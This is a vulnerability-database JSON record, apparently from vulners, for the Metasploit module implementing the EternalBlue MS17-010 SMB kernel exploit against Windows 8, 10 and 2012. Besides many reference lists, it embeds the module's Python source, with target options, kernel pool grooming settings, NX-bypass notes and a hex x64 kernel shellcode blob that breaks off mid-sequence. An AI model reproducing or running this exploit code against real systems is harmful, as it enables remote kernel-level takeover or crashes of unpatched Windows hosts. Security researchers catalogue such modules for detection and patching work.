x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. 
Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-03-21T18:43:42", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, 
{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", 
"MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-21T18:43:42", "value": 7.3, "vector": "NONE"}}, "hash": "f25f6250688bcfa885a6da7e950069c6", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-03-21T18:43:42", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-11-02T02:20:22", "objectVersion": "1.4", "published": "2018-06-15T18:36:54", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 68}, "differentElements": ["sourceData"], "edition": 83, "lastseen": "2020-03-21T18:43:42"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. 
Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "enchantments": {"dependencies": {"modified": "2020-03-25T08:38:40", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, 
{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", 
"MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-25T08:38:40", "value": 7.3, "vector": "NONE"}}, "hash": "f25f6250688bcfa885a6da7e950069c6", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "lastseen": "2020-03-25T08:38:40", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-11-02T02:20:22", "objectVersion": "1.4", "published": "2018-06-15T18:36:54", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "type": "metasploit", "viewCount": 69}, "differentElements": ["sourceData"], "edition": 87, "lastseen": "2020-03-25T08:38:40"}], "viewCount": 604, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", 
"THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-09-18T18:32:29", "rev": 2}, "score": {"value": 7.9, "vector": "NONE", "modified": "2020-09-18T18:32:29", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "sourceData": "#!/usr/bin/env python\n\nimport sys\nimport socket\nfrom struct import pack\nfrom base64 import b64decode\n\ntry:\n from impacket import smb, ntlm\nexcept ImportError:\n dependencies_missing = True\nelse:\n dependencies_missing = False\n\nfrom metasploit import module\n\nmetadata = {\n 'name': 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+',\n 'description': '''\n EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya\n The exploit might FAIL and CRASH a target system (depended on what is overwritten)\n The exploit support only x64 target\n\n Tested on:\n - Windows 2012 R2 x64\n - Windows 8.1 x64\n - Windows 10 Pro Build 10240 x64\n - Windows 10 Enterprise Evaluation Build 10586 x64\n\n\n Default Windows 8 and later installation without additional service info:\n - anonymous is not allowed to access any share 
(including IPC$)\n - More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows\n - tcp port 445 is filtered by firewall\n\n\n Reference:\n - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\n - \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit\n\n\n Exploit info:\n - If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at\n https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same\n - The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000).\n On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP.\n - The exploit is likely to crash a target when it failed\n - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\n - If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5)\n - See the code and comment for exploit detail.\n\n\n Disable NX method:\n - The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference)\n - The exploit is also the same but we need to trigger bug twice\n - First trigger, set MDL.MappedSystemVa to target pte address\n - Write '\\\\x00' to disable the NX flag\n - Second trigger, do the same as Windows 7 exploit\n - From my test, if exploit disable NX successfully, I always get code execution\n ''',\n 'authors': [\n 'Equation Group', # OG research and exploit\n 'Shadow Brokers', # Hack and dump\n 'sleepya', # Research and PoC\n 'wvu' # Babby's first external module\n ],\n 'references': [\n {'type': 'msb', 'ref': 'MS17-010'},\n {'type': 'cve', 'ref': '2017-0143'},\n {'type': 'cve', 'ref': '2017-0144'},\n {'type': 'cve', 'ref': '2017-0145'},\n {'type': 'cve', 'ref': 
'2017-0146'},\n {'type': 'cve', 'ref': '2017-0147'},\n {'type': 'cve', 'ref': '2017-0148'},\n {'type': 'edb', 'ref': '42030'},\n {'type': 'url', 'ref': 'https://github.com/worawit/MS17-010'}\n ],\n 'date': 'Mar 14 2017',\n 'type': 'remote_exploit',\n 'rank': 'average',\n 'privileged': True,\n 'wfsdelay': 5,\n 'targets': [\n {'platform': 'win', 'arch': 'x64'}\n ],\n 'options': {\n 'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},\n 'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},\n 'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'}, \n 'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': True, 'default': 13},\n # if anonymous can access any share folder, 'IPC$' is always accessible.\n # authenticated user is always able to access 'IPC$'.\n # Windows 2012 does not allow anonymous to login if no share is accessible.\n 'SMBUser': {'type': 'string', 'description': '(Optional) The username to authenticate as', 'required': False, 'default': ''},\n 'SMBPass': {'type': 'string', 'description': '(Optional) The password for the specified username', 'required': False, 'default': ''}\n },\n 'notes': {\n 'AKA': ['ETERNALBLUE']\n }\n}\n\n\n\ndef hash(process): \n # calc_hash from eternalblue_kshellcode_x64.asm \n proc_hash = 0\n for c in str( process + \"\\x00\" ):\n proc_hash = ror( proc_hash, 13 )\n proc_hash += ord( c )\n return pack('<I', proc_hash)\n\ndef ror( dword, bits ):\n return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF\n\n# git clone https://github.com/worawit/MS17-010\n# cd MS17-010/shellcode\n# nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin\ndef eternalblue_kshellcode_x64(process=\"spoolsv.exe\"):\n proc_hash = hash(process)\n return (\n 
'\\x55\\xe8\\x2e\\x00\\x00\\x00\\xb9\\x82\\x00\\x00\\xc0\\x0f\\x32\\x4c\\x8d'\n '\\x0d\\x34\\x00\\x00\\x00\\x44\\x39\\xc8\\x74\\x19\\x39\\x45\\x00\\x74\\x0a'\n '\\x89\\x55\\x04\\x89\\x45\\x00\\xc6\\x45\\xf8\\x00\\x49\\x91\\x50\\x5a\\x48'\n '\\xc1\\xea\\x20\\x0f\\x30\\x5d\\xc3\\x48\\x8d\\x2d\\x00\\x10\\x00\\x00\\x48'\n '\\xc1\\xed\\x0c\\x48\\xc1\\xe5\\x0c\\x48\\x83\\xed\\x70\\xc3\\x0f\\x01\\xf8'\n '\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8b\\x24\\x25\\xa8'\n '\\x01\\x00\\x00\\x6a\\x2b\\x65\\xff\\x34\\x25\\x10\\x00\\x00\\x00\\x50\\x50'\n '\\x55\\xe8\\xc5\\xff\\xff\\xff\\x48\\x8b\\x45\\x00\\x48\\x83\\xc0\\x1f\\x48'\n '\\x89\\x44\\x24\\x10\\x51\\x52\\x41\\x50\\x41\\x51\\x41\\x52\\x41\\x53\\x31'\n '\\xc0\\xb2\\x01\\xf0\\x0f\\xb0\\x55\\xf8\\x75\\x14\\xb9\\x82\\x00\\x00\\xc0'\n '\\x8b\\x45\\x00\\x8b\\x55\\x04\\x0f\\x30\\xfb\\xe8\\x0e\\x00\\x00\\x00\\xfa'\n '\\x41\\x5b\\x41\\x5a\\x41\\x59\\x41\\x58\\x5a\\x59\\x5d\\x58\\xc3\\x41\\x57'\n '\\x41\\x56\\x57\\x56\\x53\\x50\\x4c\\x8b\\x7d\\x00\\x49\\xc1\\xef\\x0c\\x49'\n '\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x66\\x41\\x81\\x3f\\x4d'\n '\\x5a\\x75\\xf1\\x4c\\x89\\x7d\\x08\\x65\\x4c\\x8b\\x34\\x25\\x88\\x01\\x00'\n '\\x00\\xbf\\x78\\x7c\\xf4\\xdb\\xe8\\x01\\x01\\x00\\x00\\x48\\x91\\xbf\\x3f'\n '\\x5f\\x64\\x77\\xe8\\xfc\\x00\\x00\\x00\\x8b\\x40\\x03\\x89\\xc3\\x3d\\x00'\n '\\x04\\x00\\x00\\x72\\x03\\x83\\xc0\\x10\\x48\\x8d\\x50\\x28\\x4c\\x8d\\x04'\n '\\x11\\x4d\\x89\\xc1\\x4d\\x8b\\x09\\x4d\\x39\\xc8\\x0f\\x84\\xc6\\x00\\x00'\n '\\x00\\x4c\\x89\\xc8\\x4c\\x29\\xf0\\x48\\x3d\\x00\\x07\\x00\\x00\\x77\\xe6'\n '\\x4d\\x29\\xce\\xbf\\xe1\\x14\\x01\\x17\\xe8\\xbb\\x00\\x00\\x00\\x8b\\x78'\n 